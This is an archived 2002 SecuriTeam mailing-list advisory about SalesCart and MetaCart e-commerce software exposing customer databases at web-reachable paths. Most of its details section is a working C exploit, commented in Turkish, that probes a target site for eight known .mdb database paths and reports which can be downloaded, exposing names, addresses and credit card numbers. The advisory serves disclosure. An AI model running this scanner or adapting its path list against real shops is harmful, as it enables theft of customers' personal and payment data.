[NEWS] SalesCart Database Storage Insecurity

From: support@securiteam.com
Date: 06/22/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 22 Jun 2002 08:34:49 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  SalesCart Database Storage Insecurity
------------------------------------------------------------------------

SUMMARY

 <http://www.salescart.com/> SalesCart is the first software solution to
define a revolutionary new class of e-commerce software that leverages the
web site design and development tool Microsoft FrontPage. A security
vulnerability in the product allows remote attackers to download the
product's database, thus gain access to sensitive information about users
of the product (name, surname, address, e-mail, phone number, credit card
number, and company name).

DETAILS

Example:
Accessing the following URL will return the database used by the product:
http://xxxshop.com/fpdb/shop.mdb

Exploit:
/* Salescart ve Metacart kullanILan bir alI$veri$ sitesindeki mu$teri
kayItLarInI bulma */

/* tacettinkaradeniz@yahoo.com karadenizeregli@2002
  */

/* I LoVe CiLeK :>

/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece
gerekli yerlerde
degi$iklik yaparak istediGim duzene getirdim :> */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>

void main(int argc, char *argv[])
{

  char *bulunan;
  char tampon[1024];
  char mesaj[] = "200";
  int toplam=0;
  int sayac;
  int buldum=0;
  char shoptampon[20];
  char *tmp[10];
  char *hata[10];

  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long giris;
  unsigned long duzelt;

tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n";
tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n";
tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n";
tmp[4]="GET /shopping/database/metacart.mdb
HTTP/1.0\n\n";
tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n";
tmp[6]="GET /metacart/database/metacart.mdb
HTTP/1.0\n\n";
tmp[7]="GET /mcartfree/database/metacart.mdb
HTTP/1.0\n\n";
tmp[8]="GET /ASP/cart/database/metacart.mdb
HTTP/1.0\n\n";

hata[1] = "/fpdb/shop.mdb ";
hata[2] = "/shoponline/fpdb/shop.mdb ";
hata[3] = "/database/metacart.mdb ";
hata[4] = "/shopping/database/metacart.mdb ";
hata[5] = "/shop/database/metacart.mdb ";
hata[6] = "/metacart/database/metacart.mdb ";
hata[7] = "/mcartfree/database/metacart.mdb ";
hata[8] = "/ASP/cart/database/metacart.mdb ";

if (argc<2)
  {
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\nSalescart - Metacart (c) 2002 ");
printf("\nKullanImI : %s www.xxxshopxyz.com
\n\n",argv[0]);

exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\t Salescart - Metacart (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Oleyyy.. Bulundu :\)\n");++buldum;
}
close(sock);
}

if (buldum)
{
printf("\n Tarama isLemi %s web sistesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucu bir veri
bulunamamIstIr...\n\n");

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:tacettinkaradeniz@yahoo.com>
Tacettin Karadeniz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages